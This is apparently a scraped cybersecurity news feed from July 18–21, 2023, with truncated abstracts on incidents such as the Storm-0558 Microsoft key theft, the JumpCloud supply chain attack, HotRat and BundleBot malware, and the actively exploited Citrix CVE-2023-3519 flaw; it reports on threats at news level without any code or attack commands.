The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought. According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and Outlook.com could also have allowed the adversary to forge access tokens for various types of Azure AD applications. This includes every application that supports personal account authentication, such as OneDrive, SharePoint, and Teams; customer applications that support the "Login with Microsoft" functionality; and multi-tenant applications in certain conditions. "Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Ami Luttwak, chief technology officer and co-founder of Wiz, said in a statement. "An attacker with an AAD siThe Hacker News
July 21, 2023 – Attack
Experts believe North Korea behind JumpCloud supply chain attack Full Text
Abstract
SentinelOne researchers attribute the recent supply chain attacks on JumpCloud to North Korea-linked threat actors. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless and secure...Security Affairs
July 21, 2023 – Malware
HotRat: New Variant of AsyncRAT Malware Spreading Through Pirated Software Full Text
Abstract
A new variant of AsyncRAT malware dubbed HotRat is being distributed via free, pirated versions of popular software and utilities such as video games, image and sound editing software, and Microsoft Office. "HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data," Avast security researcher Martin a Milánek said. The Czech cybersecurity firm said the trojan has been prevalent in the wild since at least October 2022, with a majority of the infections concentrated in Thailand, Guyana, Libya, Suriname, Mali, Pakistan, Cambodia, South Africa, and India. The attacks entail bundling the cracked software available online via torrent sites with a malicious AutoHotkey (AHK) script that initiates an infection chain designed to deactivate antivirus solutions on the compromised host and ultimately laThe Hacker News
July 21, 2023 – Breach
Nice Suzuki, sport: shame dealer left your data up for grabs Full Text
Abstract
Cybernews research team discovered that two Suzuki-authorized dealer websites were leaking customers' sensitive information. Suzuki or otherwise, buying a new vehicle is an intense experience with complicated credit, insurance, documentation, and contracts....Security Affairs
July 21, 2023 – Malware
HotRat as Hidden Script in Cracked Software Full Text
Abstract
In a recent encounter, security researchers stumbled across a HotRat malware distribution campaign that cybercriminals were offering bundled as cracked programs and games. HotRat is an offshoot of the open-source AsyncRAT framework. Implement strict software policies, regularly update and patch sys ...Cyware
July 21, 2023 – Malware
Sophisticated BundleBot Malware Disguised as Google AI Chatbot and Utilities Full Text
Abstract
A new malware strain known as BundleBot has been stealthily operating under the radar by taking advantage of .NET single-file deployment techniques, enabling threat actors to capture sensitive information from compromised hosts. "BundleBot is abusing the dotnet bundle (single-file), self-contained format that results in very low or no static detection at all," Check Point said in a report published this week, adding it is "commonly distributed via Facebook Ads and compromised accounts leading to websites masquerading as regular program utilities, AI tools, and games." Some of these websites aim to mimic Google Bard, the company's conversational generative artificial intelligence chatbot, enticing victims into downloading a bogus RAR archive ("Google_AI.rar") hosted on legitimate cloud storage services such as Dropbox. The archive file, when unpacked, contains an executable file ("GoogleAI.exe"), which is the .NET single-file, self-conThe Hacker News
July 21, 2023 – Attack
Android SpyNote Attacks Electric and Water Public Utility Users in Japan Full Text
Abstract
A smishing campaign is targeting Japanese Android users by posing as a power and water infrastructure company and luring victims to a phishing website to download the SpyNote malware.Cyware
July 21, 2023 – Education
Local Governments Targeted for Ransomware – How to Prevent Falling Victim Full Text
Abstract
Regardless of the country, local government is essential in most citizens' lives. It provides many day-to-day services and handles various issues. Therefore, the effects can be far-reaching and deeply felt when security failures occur. In early 2023, Oakland, California, fell victim to a ransomware attack. Although city officials have not disclosed how the attack occurred, experts suspect a phishing email is the most likely cause. As a result, city officials brought down their servers to contain the attack. Governments have been the target of many ransomware attacks and breaches. As most local governments maintain a small IT staff, there is potential for shared passwords, reused credentials, and a lack of multi-factor authentication security, exposing vulnerabilities for a breach. Oakland is Breached It was first noticed on a Wednesday evening in early February, when Oakland, California city officials quickly took most services' backend servers offline and posted a mThe Hacker News
July 21, 2023 – Ransomware
Mallox Ransomware Activity Surges by 174% Full Text
Abstract
Mallox ransomware activity surged by nearly 174% in 2023, using the new variant Xollam, employing the double extortion tactic to demand ransom from victims. The development is also being perceived as more affiliate groups coming together in this mission. Organizations must remain vigilant and adapt ...Cyware
July 21, 2023 – Denial Of Service
DDoS Botnets Hijacking Zyxel Devices to Launch Devastating Attacks Full Text
Abstract
Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical flaw in Zyxel devices that came to light in April 2023 to gain remote control of vulnerable systems. "Through the capture of exploit traffic, the attacker's IP address was identified, and it was determined that the attacks were occurring in multiple regions, including Central America, North America, East Asia, and South Asia," Fortinet FortiGuard Labs researcher Cara Lin said. The flaw, tracked as CVE-2023-28771 (CVSS score: 9.8), is a command injection bug affecting multiple firewall models that could potentially allow an unauthorized actor to execute arbitrary code by sending a specifically crafted packet to the targeted appliance. Last month, the Shadowserver Foundation warned that the flaw was being "actively exploited to build a Mirai-like botnet" at least since May 26, 2023, an indication of how abuse of servers running unpatched software is on the rise.The Hacker News
July 21, 2023 – Government
Citrix NetScaler ADC and Gateway Devices Under Attack: CISA Urges Immediate Action Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Thursday warning that the newly disclosed critical security flaw in Citrix NetScaler Application Delivery Controller (ADC) and Gateway devices is being abused to drop web shells on vulnerable systems. "In June 2023, threat actors exploited this vulnerability as a zero-day to drop a web shell on a critical infrastructure organization's non-production environment NetScaler ADC appliance," the agency said. "The web shell enabled the actors to perform discovery on the victim's active directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network segmentation controls for the appliance blocked movement." The shortcoming in question is CVE-2023-3519 (CVSS score: 9.8), a code injection bug that could result in unauthenticated remote code execution. Citrix, earlier this week, released patches for the issue andThe Hacker News
July 20, 2023 – General
Renewable technologies add risk to the US electric grid, experts warn Full Text
Abstract
Technologies that underpin solar and wind energy storage systems, which are central to transferring renewable power to the grid, are potential hacking risks, experts noted at a congressional hearing Tuesday.Cyware
July 20, 2023 – Vulnerabilities
Critical Flaws in AMI MegaRAC BMC Software Expose Servers to Remote Attacks Full Text
Abstract
Two more security flaws have been disclosed in AMI MegaRAC Baseboard Management Controller (BMC) software that, if successfully exploited, could allow threat actors to remotely commandeer vulnerable servers and deploy malware. "These new vulnerabilities range in severity from High to Critical, including unauthenticated remote code execution and unauthorized device access with superuser permissions," Eclypsium researchers Vlad Babkin and Scott Scheferman said in a report shared with The Hacker News. "They can be exploited by remote attackers having access to Redfish remote management interfaces, or from a compromised host operating system." To make matters worse, the shortcomings could also be weaponized to drop persistent firmware implants that are immune to operating system reinstalls and hard drive replacements, brick motherboard components, cause physical damage through overvolting attacks, and induce indefinite reboot loops. "As attackers shift theirThe Hacker News
July 20, 2023
Experts attribute WyrmSpy and DragonEgg spyware to the Chinese APT41 group Full Text
Abstract
China-linked group APT41 was spotted using two previously undocumented Android spyware strains called WyrmSpy and DragonEgg. China-linked APT group APT41 has been observed using two previously undocumented Android spyware strains called WyrmSpy and DragonEgg. The...Security Affairs
July 20, 2023 – Phishing
Phishing via Google Ads Full Text
Abstract
Hackers are using URL redirects within Google ads to lead users to malicious sites, leveraging the trust and legitimacy of Google Ads. This technique, known as BEC 3.0, involves referencing legitimate sites instead of spoofed ones.Cyware
July 20, 2023 – Ransomware
Mallox Ransomware Exploits Weak MS-SQL Servers to Breach Networks Full Text
Abstract
Mallox ransomware activities in 2023 have witnessed a 174% increase when compared to the previous year, new findings from Palo Alto Networks Unit 42 reveal. "Mallox ransomware, like many other ransomware threat actors, follows the double extortion trend: stealing data before encrypting an organization's files, and then threatening to publish the stolen data on a leak site as leverage to convince victims to pay the ransom fee," security researchers Lior Rochberger and Shimi Cohen said in a new report shared with The Hacker News. Mallox is linked to a threat actor that's also linked to other ransomware strains, such as TargetCompany, Tohnichi, Fargo, and, most recently, Xollam. It first burst onto the scene in June 2021. Some of the prominent sectors targeted by Mallox are manufacturing, professional and legal services, and wholesale and retail. A notable aspect of the group is its pattern of exploiting poorly secured MS-SQL servers via dictionary attacks asThe Hacker News
July 20, 2023 – Attack
ALPHV/BlackCat and Clop gangs claim to have hacked cosmetics giant Estée Lauder Full Text
Abstract
The American cosmetics giant company Estée Lauder was hacked by two distinct ransomware groups, the ALPHV/BlackCat and Clop gangs. Yesterday the cybersecurity expert @sonoclaudio first alerted me about a strange circumstance, two ransomware actors,...Security Affairs
July 20, 2023 – Breach
Tampa General Hospital Says Hackers Exfiltrated the Data of 1.2 Million Patients Full Text
Abstract
A security breach was detected on May 31, 2023, when suspicious activity was identified within its network. The affected systems were immediately taken offline to prevent further unauthorized access.Cyware
July 20, 2023 – Vulnerabilities
Apache OpenMeetings Web Conferencing Tool Exposed to Critical Vulnerabilities Full Text
Abstract
Multiple security flaws have been disclosed in Apache OpenMeetings, a web conferencing solution, that could be potentially exploited by malicious actors to seize control of admin accounts and run malicious code on susceptible servers. "Attackers can bring the application into an unexpected state, which allows them to take over any user account, including the admin account," Sonar vulnerability researcher Stefan Schiller said in a report shared with The Hacker News. "The acquired admin privileges can further be leveraged to exploit another vulnerability allowing attackers to execute arbitrary code on the Apache OpenMeetings server." Following responsible disclosure on March 20, 2023, the vulnerabilities were addressed with the release of OpenMeetings version 7.1.0 on May 9, 2023. The list of three flaws is as follows: CVE-2023-28936 (CVSS score: 5.3), insufficient check of invitation hash; CVE-2023-29032 (CVSS score: 8.1), an authentiThe Hacker News
July 20, 2023 – Malware
P2PInfect, a Rusty P2P worm targets Redis Servers on Linux and Windows systems Full Text
Abstract
Cybersecurity researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers. Palo Alto Networks Unit 42 researchers have discovered a new peer-to-peer (P2P) worm called P2PInfect that targets...Security Affairs
July 20, 2023 – Outage
Russian Medical Lab Suspends Some Services After Ransomware Attack Full Text
Abstract
Customers of the Russian medical laboratory Helix have been unable to receive their test results for several days due to a “serious” cyberattack that crippled the company's systems over the weekend.Cyware
July 20, 2023 – Attack
North Korean State-Sponsored Hackers Suspected in JumpCloud Supply Chain Attack Full Text
Abstract
An analysis of the indicators of compromise (IoCs) associated with the JumpCloud hack has uncovered evidence pointing to the involvement of North Korean state-sponsored groups, in a style that's reminiscent of the supply chain attack targeting 3CX. The findings come from SentinelOne, which mapped out the infrastructure pertaining to the intrusion to uncover underlying patterns. It's worth noting that JumpCloud, last week, attributed the attack to an unnamed "sophisticated nation-state sponsored threat actor." "The North Korean threat actors demonstrate a high level of creativity and strategic awareness in their targeting strategies," SentinelOne security researcher Tom Hegel told The Hacker News. "The research findings reveal a successful and multifaceted approach employed by these actors to infiltrate developer environments." "They actively seek access to tools and networks that can serve as gateways to more extensive opportunitieThe Hacker News
July 20, 2023 – Vulnerabilities
Adobe out-of-band update addresses an actively exploited ColdFusion zero-day Full Text
Abstract
Adobe released an emergency update to address critical vulnerabilities in ColdFusion, including an actively exploited zero-day. Adobe released an out-of-band update to address critical and moderate vulnerabilities in ColdFusion, including a zero-day...Security Affairs
July 20, 2023 – Outage
Estée Lauder Takes Down Some Systems Following Cyberattack Full Text
Abstract
The ALPHV group claims Estée Lauder has not responded and listed the company on its leak site Tuesday, according to activity observed by Emsisoft Threat Analyst Brett Callow.Cyware
July 20, 2023 – General
A Few More Reasons Why RDP is Insecure (Surprise!) Full Text
Abstract
If it seems like Remote Desktop Protocol (RDP) has been around forever, it's because it has (at least compared to the many technologies that rise and fall within just a few years.) The initial version, known as "Remote Desktop Protocol 4.0," was released in 1996 as part of the Windows NT 4.0 Terminal Server edition and allowed users to remotely access and control Windows-based computers over a network connection. In the intervening decades, RDP has become a widely used protocol for remote access and administration of Windows-based systems. RDP plays a crucial role in enabling remote work, IT support, and system management and has served as the foundation for various remote desktop and virtual desktop infrastructure (VDI) solutions. The downside of RDP's widespread use is that a Remote Code Execution (RCE) vulnerability in an RDP gateway can have severe consequences, potentially leading to significant damage and compromising the security and integrity of the affecThe Hacker News
July 20, 2023 – Solution
Microsoft Set to Expand Access to Detailed Logs in the Wake of Chinese Hacking Operation Full Text
Abstract
Microsoft said in a blog post on Wednesday that it will include “access to wider cloud security logs for our worldwide customers at no additional cost” starting in September and that it would increase default log retention from 90 to 180 days.Cyware
July 20, 2023 – Breach
Turla’s New DeliveryCheck Backdoor Breaches Ukrainian Defense Sector Full Text
Abstract
The defense sector in Ukraine and Eastern Europe has been targeted by a novel .NET-based backdoor called DeliveryCheck (aka CAPIBAR or GAMEDAY) that's capable of delivering next-stage payloads. The Microsoft threat intelligence team, in collaboration with the Computer Emergency Response Team of Ukraine (CERT-UA), attributed the attacks to a Russian nation-state actor known as Turla, which is also tracked under the names Iron Hunter, Secret Blizzard (formerly Krypton), Uroburos, Venomous Bear, and Waterbug. It's linked to Russia's Federal Security Service (FSB). "DeliveryCheck is distributed via email as documents with malicious macros," the company said in a series of tweets. "It persists via a scheduled task that downloads and launches it in memory. It also contacts a C2 server to retrieve tasks, which can include the launch of arbitrary payloads embedded in XSLT stylesheets." Successful initial access is also accompanied in some cases by tThe Hacker News
July 20, 2023 – Malware
New P2PInfect Worm Targeting Redis Servers on Linux and Windows Systems Full Text
Abstract
Cybersecurity researchers have uncovered a new cloud-targeting, peer-to-peer (P2P) worm called P2PInfect that targets vulnerable Redis instances for follow-on exploitation. "P2PInfect exploits Redis servers running on both Linux and Windows Operating Systems making it more scalable and potent than other worms," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said. "This worm is also written in Rust, a highly scalable and cloud-friendly programming language." It's estimated that as many as 934 unique Redis systems may be vulnerable to the threat. The first known instance of P2PInfect was detected on July 11, 2023. A notable characteristic of the worm is its ability to infect vulnerable Redis instances by exploiting a critical Lua sandbox escape vulnerability, CVE-2022-0543 (CVSS score: 10.0), which has been previously exploited to deliver multiple malware families such as Muhstik, Redigo, and HeadCrab over the past yeThe Hacker News
July 20, 2023 – General
Microsoft Expands Cloud Logging to Counter Rising Nation-State Cyber Threats Full Text
Abstract
Microsoft on Wednesday announced that it's expanding cloud logging capabilities to help organizations investigate cybersecurity incidents and gain more visibility after facing criticism in the wake of a recent espionage attack campaign aimed at its email infrastructure. The tech giant said it's making the change in direct response to the increasing frequency and evolution of nation-state cyber threats. It's expected to roll out starting in September 2023 to all government and commercial customers. "Over the coming months, we will include access to wider cloud security logs for our worldwide customers at no additional cost," Vasu Jakkal, corporate vice president of security, compliance, identity, and management at Microsoft, said. "As these changes take effect, customers can use Microsoft Purview Audit to centrally visualize more types of cloud log data generated across their enterprise." As part of this change, users are expected to receive access toThe Hacker News
July 20, 2023 – Vulnerabilities
Adobe Rolls Out New Patches for Actively Exploited ColdFusion Vulnerability Full Text
Abstract
Adobe has released a fresh round of updates to address an incomplete fix for a recently disclosed ColdFusion flaw that has come under active exploitation in the wild. The critical shortcoming, tracked as CVE-2023-38205 (CVSS score: 7.5), has been described as an instance of improper access control that could result in a security bypass. It impacts the following versions: ColdFusion 2023 (Update 2 and earlier versions), ColdFusion 2021 (Update 8 and earlier versions), and ColdFusion 2018 (Update 18 and earlier versions). "Adobe is aware that CVE-2023-38205 has been exploited in the wild in limited attacks targeting Adobe ColdFusion," the company said. The update also addresses two other flaws, including a critical deserialization bug (CVE-2023-38204, CVSS score: 9.8) that could lead to remote code execution and a second improper access control flaw that could also pave the way for a security bypass (CVE-2023-38206, CVSS score: 5.3). The disclosure arrives daysThe Hacker News
July 19, 2023 – Policy and Law
Legislators say HHS is failing to adequately protect health records from law enforcement Full Text
Abstract
Lawmakers are demanding the Department of Health and Human Services (HHS) to prevent law enforcement from accessing reproductive and other health records without a warrant.Cyware
July 19, 2023 – Education
How to Manage Your Attack Surface? Full Text
Abstract
Attack surfaces are growing faster than security teams can keep up. To stay ahead, you need to know what's exposed and where attackers are most likely to strike. With cloud migration dramatically increasing the number of internal and external targets, prioritizing threats and managing your attack surface from an attacker's perspective has never been more important. Let's look at why it's growing, and how to monitor and manage it properly with tools like Intruder. What is your attack surface? First, it's important to understand that your attack surface is the sum of your digital assets that are 'exposed' – whether the digital assets are secure or vulnerable, known or unknown, in active use or not. This attack surface changes continuously over time, and includes digital assets that are on-premises, in the cloud, in subsidiary networks, and in third-party environments. In short, it's anything that a hacker can attack. What is attack surface managemenThe Hacker News
July 19, 2023 – Botnet
Ukraine’s cyber police dismantled a massive bot farm spreading propaganda Full Text
Abstract
The Cyber Police Department of the National Police of Ukraine dismantled a massive bot farm and seized 150,000 SIM cards. A gang of more than 100 individuals used fake social network accounts to conduct disinformation and psychological operations...Security Affairs
July 19, 2023 – Attack
DangerousPassword Attacks Targeting Developers’ Windows, macOS, and Linux Environments Full Text
Abstract
The targeted attack group DangerousPassword has been continuously attacking cryptocurrency exchange developers since June 2019, using malware that infects Windows, macOS, and Linux environments with Python and Node.js installed.Cyware
July 19, 2023 – Government
CISA and NSA Issue New Guidance to Strengthen 5G Network Slicing Against Threats Full Text
Abstract
U.S. cybersecurity and intelligence agencies have released a set of recommendations to address security concerns with 5G standalone network slicing and harden them against possible threats. "The threat landscape in 5G is dynamic; due to this, advanced monitoring, auditing, and other analytical capabilities are required to meet certain levels of network slicing service level requirements over time," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) said. 5G is the fifth-generation technology standard for broadband cellular networks, offering increased data speeds and lower latency. Network slicing is an architectural model that allows mobile service providers to partition their network into several independent "slices" in order to create virtual networks that cater to different clients and use cases. The latest advisory builds upon guidance previously issued by the agencies in December 2022, warningThe Hacker News
July 19, 2023 – Government
US Gov adds surveillance firms Cytrox and Intellexa to Entity List for trafficking in cyber exploits Full Text
Abstract
The U.S. government added surveillance technology vendors Cytrox and Intellexa to an economic blocklist for trafficking in cyber exploits. The Commerce Department’s Bureau of Industry and Security (BIS) added surveillance technology vendors Intellexa...Security Affairs
July 19, 2023 – Attack
New Attack Campaign Enters the ‘FakeUpdates’ Arena to Deliver NetSupport RAT Full Text
Abstract
A new campaign called FakeSG, similar to SocGholish, is using hacked WordPress websites to distribute the NetSupport RAT and deliver additional payloads. FakeSG utilizes different layers of obfuscation and delivery techniques.Cyware
July 19, 2023
Chinese APT41 Hackers Target Mobile Devices with New WyrmSpy and DragonEgg Spyware Full Text
Abstract
The prolific China-linked nation-state actor known as APT41 has been linked to two previously undocumented strains of Android spyware called WyrmSpy and DragonEgg. "Known for its exploitation of web-facing applications and infiltration of traditional endpoint devices, an established threat actor like APT 41 including mobile in its arsenal of malware shows how mobile endpoints are high-value targets with coveted corporate and personal data," Lookout said in a report shared with The Hacker News. APT41, also tracked under the names Axiom, Blackfly, Brass Typhoon (formerly Barium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti, is known to be operational since at least 2007, targeting a wide range of industries to conduct intellectual property theft. Recent attacks mounted by the adversarial collective have leveraged an open-source red teaming tool known as Google Command and Control (GC2) as part of attacks aimed at media and job platforms in Taiwan and Italy. The initThe Hacker News
July 19, 2023 – Vulnerabilities
Citrix warns of actively exploited zero-day in ADC and Gateway Full Text
Abstract
Citrix is warning customers of an actively exploited critical vulnerability in NetScaler Application Delivery Controller (ADC) and Gateway. Citrix is warning customers of a critical vulnerability, tracked as CVE-2023-3519 (CVSS score: 9.8), in NetScaler...Security Affairs
July 19, 2023 – Outage
Norwegian Mining and Recycling Company TOMRA Experiences Disruptive Cyberattack Full Text
Abstract
The cyberattack on TOMRA highlights the ongoing threat to companies involved in critical infrastructure, with potential significant financial and social damage if operations are disrupted.Cyware
July 19, 2023 – Criminals
Exploring the Dark Side: OSINT Tools and Techniques for Unmasking Dark Web Operations Full Text
Abstract
On April 5, 2023, the FBI and Dutch National Police announced the takedown of Genesis Market, one of the largest dark web marketplaces. The operation, dubbed "Operation Cookie Monster," resulted in the arrest of 119 people and the seizure of over $1M in cryptocurrency. You can read the FBI's warrant here for details specific to this case. In light of these events, I'd like to discuss how OSINT can assist with dark web investigations. The Dark Web's anonymity attracts a variety of users, from whistleblowers and political activists to cybercriminals and terrorists. There are several techniques that can be used to try and identify the individuals behind these sites and personas. Technical vulnerabilities: while not considered OSINT, there have been instances when technical vulnerabilities have existed in the technology used to host dark websites. These vulnerabilities may exist in the software itself or be due to misconfigurations, but they can sometimes reveaThe Hacker News
July 19, 2023 – Breach
FIA World Endurance Championship driver passports leaked Full Text
Abstract
Le Mans Endurance Management, operating the FIA World Endurance Championship’s website, exposed the data of hundreds of drivers by leaking their IDs and drivers’ licenses, the Cybernews research team has discovered. On June 16th, our researchers...Security Affairs
July 19, 2023 – General
Trends in Ransomware-as-a-Service and Cryptocurrency to Monitor Full Text
Abstract
To defend against RaaS groups, organizations need a holistic, defense-in-depth approach that includes measures like multi-factor authentication, email security, patch management, and comprehensive asset management.Cyware
July 19, 2023 – Vulnerabilities
Bad.Build Flaw in Google Cloud Build Raises Concerns of Privilege Escalation Full Text
Abstract
Cybersecurity researchers have uncovered a privilege escalation vulnerability in Google Cloud that could enable malicious actors to tamper with application images and infect users, leading to supply chain attacks. The issue, dubbed Bad.Build, is rooted in the Google Cloud Build service, according to cloud security firm Orca, which discovered and reported the issue. "By abusing the flaw and enabling an impersonation of the default Cloud Build service, attackers can manipulate images in the Google Artifact Registry and inject malicious code," the company said in a statement shared with The Hacker News. "Any applications built from the manipulated images are then affected and, if the malformed applications are meant to be deployed on customer's environments, the risk crosses from the supplying organization's environment to their customers' environments, constituting a major supply chain risk." Following responsible disclosure, Google has issued aThe Hacker News
July 19, 2023 – Criminals
Ukraine Police Bust Another Bot Farm Accused of Pro-Russia Propaganda, Internet Fraud Full Text
Abstract
Ukraine's Cyber Police shut down yet another bot farm that was reportedly spreading disinformation about the war in Ukraine on social media, just one month after a similar illicit operation was raided in west-central Ukraine.Cyware
July 19, 2023 – Privacy
U.S. Government Blacklists Cytrox and Intellexa Spyware Vendors for Cyber Espionage Full Text
Abstract
The U.S. government on Tuesday added two foreign commercial spyware vendors, Cytrox and Intellexa, to an economic blocklist for weaponizing cyber exploits to gain unauthorized access to devices and "threatening the privacy and security of individuals and organizations worldwide." This includes the companies' corporate holdings in Hungary (Cytrox Holdings Crt), North Macedonia (Cytrox AD), Greece (Intellexa S.A.), and Ireland (Intellexa Limited). By adding to the economic denylist, it prohibits U.S. companies from transacting with these businesses. "Recognizing the increasingly key role that surveillance technology plays in enabling campaigns of repression and other human rights abuses, the Commerce Department's action today targets these entities' ability to access commodities, software, and technology that could contribute to the development of surveillance tools that pose a risk of misuse in violations or abuses of human rights," the Bureau of IndusThe Hacker News
July 19, 2023 – Insider Threat
FIA World Endurance Championship Driver Passports Left Unsecured Full Text
Abstract
On June 16th, Cybernews researchers came across two misconfigured, meaning publicly exposed, Google Cloud Storage buckets. Both combined, they contained over 1.1 million files.Cyware
July 19, 2023 – Vulnerabilities
Zero-Day Attacks Exploited Critical Vulnerability in Citrix ADC and Gateway Full Text
Abstract
Citrix is alerting users of a critical security flaw in NetScaler Application Delivery Controller (ADC) and Gateway that it said is being actively exploited in the wild. Tracked as CVE-2023-3519 (CVSS score: 9.8), the issue relates to a case of code injection that could result in unauthenticated remote code execution. It impacts the following versions: NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13; NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13; NetScaler ADC and NetScaler Gateway version 12.1 (currently end-of-life); NetScaler ADC 13.1-FIPS before 13.1-37.159; NetScaler ADC 12.1-FIPS before 12.1-55.297; and NetScaler ADC 12.1-NDcPP before 12.1-55.297. The company did not give further details on the flaw tied to CVE-2023-3519 other than to say that exploits for the flaw have been observed on "unmitigated appliances." However, successful exploitation requires the device to be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDThe Hacker News
July 18, 2023
Gamaredon APT Steals Data Within an Hour Full Text
Abstract
Once again, the Gamaredon APT is carrying out a new wave of phishing attacks targeting Ukrainian government agencies, stealing data within an hour of the attack. The campaign is aimed at entities in Ukraine, including security services, military, and government organizations. It is advised tha ...Cyware
July 18, 2023 – Attack
Pakistani Entities Targeted in Sophisticated Attack Deploying ShadowPad Malware Full Text
Abstract
An unidentified threat actor compromised an application used by multiple entities in Pakistan to deliver ShadowPad, a successor to the PlugX backdoor that's commonly associated with Chinese hacking crews. Targets included a Pakistan government entity, a public sector bank, and a telecommunications provider, according to Trend Micro. The infections took place between mid-February 2022 and September 2022. The cybersecurity company said the incident could be the result of a supply-chain attack, in which a legitimate piece of software used by targets of interest is trojanized to deploy malware capable of gathering sensitive information from compromised systems. The attack chain takes the form of a malicious installer for E-Office, an application developed by the National Information Technology Board (NITB) of Pakistan to help government departments go paperless. It's currently not clear how the backdoored E-Office installer was delivered to the targets. That said, thereThe Hacker News
July 18, 2023 – Breach
Virustotal data leak exposed data of some registered customers, including intelligence members Full Text
Abstract
The online malware scanning service VirusTotal leaked data associated with some registered customers, German newspapers reported. German newspapers Der Spiegel and Der Standard reported that the online malware scanning service VirusTotal leaked...Security Affairs
July 18, 2023 – Policy and Law
Update: UKG Agrees to Pay Up to $6M in Lawsuit Tied to 2021 Breach Full Text
Abstract
The ransomware attack, which impacted multiple UKG customers such as Tesla, PepsiCo, Whole Foods, and New York City’s Metropolitan Transportation Authority, hindered some customers’ ability to process payroll.Cyware
July 18, 2023 – Insider Threat
VirusTotal Data Leak Exposes Some Registered Customers’ Details Full Text
Abstract
Data associated with a subset of registered customers of VirusTotal, including their names and email addresses, were exposed after an employee inadvertently uploaded the information to the malware scanning platform. The security incident, which comprises a database of 5,600 names in a 313KB file, was first disclosed by Der Spiegel and Der Standard yesterday. Launched in 2004, VirusTotal is a popular service that analyzes suspicious files and URLs to detect types of malware and malicious content using antivirus engines and website scanners. It was acquired by Google in 2012 and became a subsidiary of Google Cloud's Chronicle unit in 2018. When reached for comment, Google confirmed the leak and said it took immediate steps to remove the data. "We are aware of the unintentional distribution of a small segment of customer group administrator emails and organization names by one of our employees on the VirusTotal platform," a Google Cloud spokesperson told The HackerThe Hacker News
July 18, 2023 – Criminals
FIN8 Group spotted delivering the BlackCat Ransomware Full Text
Abstract
The cybercrime group FIN8 is using a revamped version of the Sardonic backdoor to deliver the BlackCat ransomware. The financially motivated group FIN8 (aka Syssphinx) was spotted using a revamped version of a backdoor tracked as Sardonic to deliver...Security Affairs
July 18, 2023 – Criminals
Black Hat Hacker Exposes Real Identity After Infecting Own Computer With Malware Full Text
Abstract
Using the online moniker ‘La_Citrix’, the threat actor has been active on Russian-speaking cybercrime forums since 2020, offering access to hacked companies and info-stealer logs from active infections.Cyware
July 18, 2023 – Criminals
Go Beyond the Headlines for Deeper Dives into the Cybercriminal Underground Full Text
Abstract
Discover stories about threat actors' latest tactics, techniques, and procedures from Cybersixgill's threat experts each month. Each story brings you details on emerging underground threats, the threat actors involved, and how you can take action to mitigate risks. Learn about the top vulnerabilities and review the latest ransomware and malware trends from the deep and dark web. Stolen ChatGPT credentials flood dark web markets: over the past year, 100,000 stolen credentials for ChatGPT were advertised on underground sites, being sold for as little as $5 on dark web marketplaces in addition to being offered for free. Stolen ChatGPT credentials include usernames, passwords, and other personal information associated with accounts. This is problematic because ChatGPT accounts may store sensitive information from queries, including confidential data and intellectual property. Specifically, companies increasingly incorporate ChatGPT into daily workflows, which means employees may discloseThe Hacker News
July 18, 2023 – Attack
Hacking campaign targets sites using WordPress WooCommerce Payments Plugin Full Text
Abstract
Threat actors are actively exploiting a critical flaw, tracked as CVE-2023-28121, in the WooCommerce Payments WordPress plugin. Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2023-28121 (CVSS score:...Security Affairs
July 18, 2023 – Government
White House Unveils Consumer Labeling Program to Strengthen IoT Security Full Text
Abstract
The Biden administration has considered an Energy Star type of consumer labeling program a key part of an effort to strengthen the nation’s cyber infrastructure following the SolarWinds and Colonial Pipeline attacks.Cyware
July 18, 2023 – Criminals
FIN8 Group Using Modified Sardonic Backdoor for BlackCat Ransomware Attacks Full Text
Abstract
The financially motivated threat actor known as FIN8 has been observed using a "revamped" version of a backdoor called Sardonic to deliver the BlackCat ransomware. According to the Symantec Threat Hunter Team, part of Broadcom, the development is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. The intrusion attempt took place in December 2022. FIN8 is being tracked by the cybersecurity company under the name Syssphinx. Known to be active since at least 2016, the adversary was originally attributed to attacks targeting point-of-sale (PoS) systems using malware such as PUNCHTRACK and BADHATCH. The group resurfaced after more than a year in March 2021 with an updated version of BADHATCH, following it up with a completely new bespoke implant called Sardonic, which was disclosed by Bitdefender in August 2021. "The C++-based Sardonic backdoor has the ability to harvest system information and execute coThe Hacker News
July 18, 2023 – Attack
JumpCloud revealed it was hit by a sophisticated attack by a nation-state actor Full Text
Abstract
Software firm JumpCloud announced it was the victim of a sophisticated cyber attack carried out by a nation-state actor. JumpCloud is a cloud-based directory service platform designed to manage user identities, devices, and applications in a seamless...Security Affairs
July 18, 2023 – Breach
Phoenician Medical Center Cyberattack Affects Up to 162,500 Patients Full Text
Abstract
The forensic investigation confirmed that there had been unauthorized access to files containing the protected health information of patients, some of which may have been obtained by the hackers.Cyware
July 18, 2023 – Policy and Law
Owner of BreachForums Pleads Guilty to Cybercrime and Child Pornography Charges Full Text
Abstract
Conor Brian Fitzpatrick , the owner of the now-defunct BreachForums website, has pleaded guilty to charges related to his operation of the cybercrime forum as well as having child pornography images. The development, first reported by DataBreaches.net last week, comes nearly four months after Fitzpatrick (aka pompompurin) was formally charged in the U.S. with conspiracy to commit access device fraud and possession of child pornography. BreachForums, launched in March 2022, operated as an illegal marketplace that allowed its members to trade hacked or stolen databases, enabling other criminal actors to gain unauthorized access to target systems. It was shut down in March 2023 shortly after Fitzpatrick's arrest in New York. As many as 888 databases consisting of 14 billion individual records are estimated to have been found in total. The forum had over 333,000 members prior to its takedown. "The purpose of BreachForums, and Fitzpatrick's intent in operating the fThe Hacker News
